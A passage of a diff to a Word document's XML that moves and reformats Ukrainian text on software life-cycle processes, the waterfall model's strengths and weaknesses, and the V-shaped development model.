-        <w:t xml:space="preserve">апаратного, так і програмного забезпечення, необхідні функції застосовуються до ПЗ і обладнання відповідно до загальної </w:t>
+        <w:t xml:space="preserve"> розподілу - може бути пропущений для систем з розробки виключно ПО. Для систем, в яких необхідна розробка як апаратного, так і програмного забезпечення, необхідні функції застосовуються до ПЗ і обладнання відповідно до загальної </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -876,6 +828,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">процес визначення вимог - визначаються програмні вимозі для інформаційної предметної області системи, призначення, лінії поведінки, продуктивність і інтерфейси. </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -1105,16 +1058,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">процес супроводу - пов'язаний з дозволом програмних помилок, несправностей. збоїв, модернізацією та внесенням змін, що генеруються </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">процесом </w:t>
+        <w:t xml:space="preserve">процес супроводу - пов'язаний з дозволом програмних помилок, несправностей. збоїв, модернізацією та внесенням змін, що генеруються процесом </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -1173,6 +1117,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>процес виведення з експлуатації - ви</w:t>
       </w:r>
       <w:r>
@@ -1291,10 +1236,13 @@
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="360"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -1309,6 +1257,7 @@
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -1320,18 +1269,6 @@
         </w:rPr>
         <w:t>Переваги каскадної моделі</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1755,7 +1692,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Вона являє собою шаблон, в який можна помістити методи для виконання аналізу, проектування, кодування, тестування і забезпечення;</w:t>
       </w:r>
     </w:p>
@@ -1820,6 +1756,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>вона сприяє здійсненню суворого контролю менеджменту проекту;</w:t>
       </w:r>
     </w:p>
@@ -2141,17 +2078,6 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2251,7 +2177,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>вона не може запобігти виникненню ітерацій між фазами, які так часто зустрічаються при розробці ПЗ, оскільки сама модель створюється відповідно до стандартного циклу апаратного інжинірингу;</w:t>
       </w:r>
     </w:p>
@@ -2320,6 +2245,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>інтеграція всіх отриманих результатів відбувається раптово в завершальній стадії роботи моделі. В результаті такого одиничного проходу через весь процес, пов'язані з інтеграцією проблеми, як правило, дають про себе знати занадто пізно. Отже, виявилися не виявлені раніше помилки або конструктивні недоліки, підвищити ступінь ризику при невеликому завданню часу на відновлення продукту;</w:t>
       </w:r>
     </w:p>
@@ -2463,7 +2389,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>проект можна виконати, застосувавши впорядковану каскадну модель, і привести його у відповідність з письмовими вимогами, що, однак, не гарантує його запуску в експлуатацію;</w:t>
       </w:r>
     </w:p>
@@ -2514,7 +2439,17 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>для кожної фази створюються результативні дані, які по його завершенню вважаються замороженими. Це означає, що вони не повинні змінюватися на наступних етапах життєвого циклу продукту. Якщо елемент результативних даних будь-якого етапу змінюється (що зустрічається досить часто), на проект зробить негативний вплив зміна графіка, оскільки ні модель, ні план не були розраховані на внесення та дозвіл зміни на більш пізніх етапах життєвого циклу;</w:t>
+        <w:t xml:space="preserve">для кожної фази створюються результативні дані, які по його завершенню вважаються замороженими. Це означає, що вони не </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>повинні змінюватися на наступних етапах життєвого циклу продукту. Якщо елемент результативних даних будь-якого етапу змінюється (що зустрічається досить часто), на проект зробить негативний вплив зміна графіка, оскільки ні модель, ні план не були розраховані на внесення та дозвіл зміни на більш пізніх етапах життєвого циклу;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2650,17 +2585,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve"> дозволяє повторно </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>розподілити кошти, не зруйнувавши при цьому проект в процесі його виконання;</w:t>
+        <w:t xml:space="preserve"> дозволяє повторно розподілити кошти, не зруйнувавши при цьому проект в процесі його виконання;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2747,6 +2672,199 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>V-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>подібна</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> модель була с</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>творена з метою допомогти працю</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ючій</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> над проектом команді в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>плануванні</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">з забезпеченням подальшої можливості тестування системи. У цій моделі особливе значення надається діям, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>спрямованим на верифікацію і атестацію продукту. Вона демонстру</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>є,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> що тестування продукту обговорюється</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> проектує</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ться</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> і планується на ранніх етапах життєвого циклу розробки. План випробування приймання замовником розробляється на етапі планування, а компоновочного випробування системи </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>-н</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">а фазах аналізу, розробки проекту і т.д. Цей процес розробки планів випробування позначений </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>пунктирною</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> лінією між прямокутниками V-подібної моделі.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:ind w:left="360"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2789,16 +2907,35 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> модель була с</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>творена з метою допомогти працю</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> модель, показана </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:strike/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>на рис. 4.10</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, була розроблена як </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2806,15 +2943,69 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>ючій</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> над проектом команді в </w:t>
+        <w:t>ізновид</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> каскадної моделі, а значить, успадкувала від неї таку ж послідовну структуру. Кожна наступна фаза починається </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ісля завершення отримання результативних даних попередньої фази. Модель демонструє комплексний </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідхід до визначення фаз процесу розробки ПО. У ній підкреслені взаємозв'язки, що існують між аналітичними фазами і </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>фазами</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2823,288 +3014,19 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>плануванні</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>і</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>з забезпеченням подальшої можливості тестування системи. У цій моделі особливе значення надається діям, спрямованим на верифікацію і атестацію продукту. Вона демонстру</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>є,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> що тестування продукту обговорюється</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> проектує</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>ться</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> і планується на ранніх етапах життєвого циклу розробки. План випробування приймання замовником розробляється на етапі планування, а компоновочного випробування системи </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>-н</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">а фазах аналізу, розробки проекту і т.д. Цей процес розробки планів випробування позначений </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>пунктирною</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> лінією між прямокутниками V-подібної моделі.</w:t>
+        <w:t>проектування</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>, які передують кодування, після якого йдуть фази тестування. Пунктирні лінії означаают, що ці фази необхідно розглядати паралельно.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>V-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>подібна</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> модель, показана </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:strike/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>на рис. 4.10</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, була розроблена як </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>ізновид</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> каскадної моделі, а значить, успадкувала від неї таку ж послідовну структуру. Кожна наступна фаза починається </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ісля завершення отримання результативних даних попередньої фази. Модель демонструє комплексний </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ідхід до визначення фаз процесу розробки ПО. У ній підкреслені взаємозв'язки, що існують між аналітичними фазами і </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>фазами</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
